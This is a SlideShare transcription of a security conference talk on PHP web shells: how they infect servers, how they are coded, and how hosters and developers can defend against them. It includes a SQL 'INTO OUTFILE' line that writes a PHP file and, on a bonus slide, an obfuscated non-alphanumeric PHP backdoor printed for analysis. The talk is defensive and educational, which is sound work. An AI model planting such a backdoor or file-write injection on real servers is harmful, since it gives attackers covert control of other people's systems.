SlideShare a Scribd company logo

Anatomy of PHP Shells

Vedran Krivokuca
Vedran Krivokuca

My talk at regional security conference, FSEC @FOI University, Varaždin, Croatia Co-author: Ivan Špoljarić

1 of 39
Download to read offline
Vedran Krivokuća, <vedran.krivokuca@nimium.hr> Ivan Špoljarić, <ivan.spoljaric@nimium.hr> Anatomy of PHP shell scripts
A little about PHP shells in general
● Scripts written (mostly) in PHP*; ● Placed on a server (mostly under existing PHP sites) without authorization from server/web site owner; ● Used for "unauthorized maintenance" of the infected server; ● By the "unauthorized maintenance", we mean literally anything. What are PHP shell scripts?
● Running applications/scripts (with root privileges) ● "Piggybacking" on existing local exploits ● Modifying files ● Changing user passwords ● Enabling/disabling/reconfiguring system services ● Dumping, destroying and modifying databases ● Opening new backdoors to the system "Unauthorized maintenance"
● Surprisingly yes, C99shell and all of it's derivates seem to be most widespread PHP Shells out there. ● There are literally thousands of PHP shell scripts out there, quality varies. Are there "the best" PHP shells?
Methods of infection by PHP shells
● Documentation for PHP, not the language itself, is a root of all evil. ● You don't believe it? This is how bad it is: Root Of All Evil
How hard could this possibly be?
● But most of the responsibility is on the programmer. ● PHP team often does good job describing possible security pitfalls in their documentation Documented possible pitfalls
● attacks through standard filesystem functions which allow socket operations like fopen(), include(), require()...* ● attacks through unvalidated upload forms (not documented clearly enough, obviously...) ● in the worst case scenario, due to constellation of multiple bugs/vulnerabilities/weak setup, attacker might even use SQL injection to write files on your server! mysql> SELECT `injected_malicious_data` FROM `yourtable` INTO OUTFILE "file.php" Documented possible vulnerabilities
● Legend says there were infections with shell scripts through stolen FTP credentials. So, it's about time you change your "god", "sex" and "love" stuff. Also, change those "password" and "password123". In other words, your server's security is as strong as it is its weakest link. ● On shared hosting environments without proper user account isolation, it might not even be you who is infected but other shared hosting client. Consult hosting support in order to track down how you were attacked. Other methods of infection
What if...?
And now the interesting part... Let's take a peek at PHP shells code
● Rather clever, if not smart, architecture ● Written mostly in PHP, but can bring any exploiting code inside PHP source code in binary (compiled) form (mostly base64 encoded within variables) or even download needed exploits (source or binary) from 3rd party sites, compile and/or run them. ● If needed, can pull its own components from 3rd party sites. General architecture
● Decentralized development ● Resulting in many variations of all of PHP shells in the wild ● Code often complied to such development process, usually securing itself from redefining crucial components (if !function_exists())... prior to all important definitions) ● Can rely on 0-day exploits! Quick development cycle
● The scary part: it's a really short way from "plain PHP shell" to a full-blown bot script controlled through IRC Quick development cycle
● Not written by your know-just-a-little-coding regular PHP dev (no pun intended) ● You'll see what I mean... Coding style
● Well documented code: function mysql_query_parse($query, $output_type) { /* if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ ... } Coding style
● Proper understanding and usage of variable scopes: function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; ... } Coding style
● It's usually safer code than many of the production PHP code in the wild: ● If it's a cross-platform shell, it performs checks before doing a function unavailable on other platform(s) ● Variables included in HTML output are escaped, so no easy path to unwanted XSS ● SQL query parameters are also escaped, no easy path to unwanted SQL injections Coding style
● Variable/function names obfuscation is done/not done in approximately 50:50 examples from our collected PHP shells ● External URLs, usernames, passwords are mostly always encoded using either base64 encoding or some kind of ascii-code-to-hex-codes conversion ● Obviously not for real protection but obfuscation against most obvious pattern-searching during attempts of detection* Coding style
GUI
● Mostly quite ugly but always very efficient ● Sortable table outputs on every field ● You might be tempted to administer your server solely through PHP shell scripts. :-) GUI
Defensive measures
There are no shortcuts!
These recommendations are best for hosters, but the developers are also invited to have them in mind! ● Whenever possible, chroot or go even further with isolation of different web sites on the same machine (containers/pseudo-virtualization/virtualization), limiting potential damage to just one site. ● Regulary update your server's OS – PHP shells (as we've learned) can bring along local exploits. ● Seriously consider complex password policies if you're running shared hosting environment. System preparation
● Disable potentially dangerous socket functionality of filesystem PHP functions if you don't need it (allow_url_fopen, allow_url_include in php.ini) if you're not sure – you don't need it ● When editing, keep in mind some systems (*cough*Debian*cough*) may have multiple php.ini files (one for mod_php, one for CLI, one for CGI...). Take care of them all. ● Follow usual security principles in server administration and maintenance. Global PHP configuration
● Consider further crippling PHP by disabling at least program execution PHP functions if you don't need them (through disable_functions). ● Which are those? http://www.php.net/manual/en/ref.exec.php ● Leave something enabled from program execution functions?* escapeshellarg(), escapeshellcmd() ● While on that subject – you can't disable eval() like this. :-) Global PHP configuration
● Always be checking uploaded files! (it is incredible how much code does not do any kind of checks) ● Keep in mind not to rely on $_FILES[…]['type']. Why? Follow good coding practices
$_FILES[...]["type"]
● In general, checking for file extension could do you just well... If you don't end up only on that, use it as the primary defense measure. ● That might just not be enough sometimes. You might want to step-up this game: ● check for mime-type on server. On linux, you can use external FILE(1) utility. Assuming you haven't disabled program execution functions. ● We'll see how others do it later. Ok, how to check uploaded files?
● Always be sanitizing and validating inputs. PHP shells can be injected through various vectors: ● Apply programming techniques to eliminate possible SQL injections (escaping, parametrization...) ● Always be escaping shell commands you execute and their arguments. ● Always doublecheck on filenames of files (and their paths!) you handle from the code! Follow good coding practices
How to others defend themselves? (three examples)
● As far as file uploads go, WordPress checks for uploaded media types by instancing them in respective modules (i. e. calls GD's getimagesize() on images) ● WordPress is generally very safe CMS. 3rd party plugins are usually the source of security issues and PHP shell infections. WordPress
● Puts no limitation itself on the uploaded content, since it is attached to e-mail messages and then deleted from temporary locations. ● Is it possible to attack remote e-mail clients like that? Depending on the destination client, it's possible. Not something Roundcube devs should and could focus on. Roundcube webmail
● Guesses the mime-type by extension, and you limit allowed mime-types for upload through configuration. ● You can enable upload of "dangerous file types" if you want. Dokuwiki
Bonus slide What happens when frustrated Sendmail administrators write PHP shells? http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
@$_[]=@!+_; $__=@${_}>>$_; $_[]=$__; $_[]=@_; $_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__]; $_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] = ($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .= ($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .= ($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_]); #ep1cw1n

Recommended

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
c0c0n - International Cyber Security and Policing Conference
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-Pillage
VeilFramework
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
VeilFramework
 
How to convince a malware to avoid us
How to convince a malware to avoid usHow to convince a malware to avoid us
How to convince a malware to avoid us
Csaba Fitzl
 

Recommended

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
c0c0n - International Cyber Security and Policing Conference
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-Pillage
VeilFramework
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
VeilFramework
 
How to convince a malware to avoid us
How to convince a malware to avoid usHow to convince a malware to avoid us
How to convince a malware to avoid us
Csaba Fitzl
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
Pichaya Morimoto
 
Understand study
Understand studyUnderstand study
Understand study
Antonio Costa aka Cooler_
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
Yury Chemerkin
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
Csaba Fitzl
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Nikto
NiktoNikto
Nikto
Sorina Chirilă
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
0d1n
0d1n0d1n
0d1n
Antonio Costa aka Cooler_
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NoSuchCon
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
Netsparker
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
jemtallon
 

More Related Content

What's hot

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
Pichaya Morimoto
 
Understand study
Understand studyUnderstand study
Understand study
Antonio Costa aka Cooler_
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
Yury Chemerkin
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
Csaba Fitzl
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Nikto
NiktoNikto
Nikto
Sorina Chirilă
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
0d1n
0d1n0d1n
0d1n
Antonio Costa aka Cooler_
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NoSuchCon
 

What's hot (20)

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
 
Understand study
Understand studyUnderstand study
Understand study
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Flashack
FlashackFlashack
Flashack
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Nikto
NiktoNikto
Nikto
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
0d1n
0d1n0d1n
0d1n
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 

Similar to Anatomy of PHP Shells

Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
Netsparker
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
jemtallon
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
Mohmad Feroz
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
Andrew Sorensen
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
Positive Hack Days
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
Positive Hack Days
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
qqlan
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
CTruncer
 
IT glossary
IT glossaryIT glossary
IT glossary
Md. Foyaz Ullah Shahin
 
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
Emertxe Information Technologies Pvt Ltd
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction to Command LineChapter 1: Introduction to Command Line
Chapter 1: Introduction to Command Line
azzamhadeel89
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
nullowaspmumbai
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
Sleepy Head
 
Learn PHP Lacture1
Learn PHP Lacture1Learn PHP Lacture1
Learn PHP Lacture1
ADARSH BHATT
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction to Command LineChapter 1: Introduction to Command Line
Chapter 1: Introduction to Command Line
azzamhadeel89
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Giuseppe Paterno'
 

Similar to Anatomy of PHP Shells (20)

Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
 
IT glossary
IT glossaryIT glossary
IT glossary
 
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction to Command LineChapter 1: Introduction to Command Line
Chapter 1: Introduction to Command Line
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
 
Learn PHP Lacture1
Learn PHP Lacture1Learn PHP Lacture1
Learn PHP Lacture1
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction to Command LineChapter 1: Introduction to Command Line
Chapter 1: Introduction to Command Line
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 

Recently uploaded

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 

Recently uploaded (20)

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
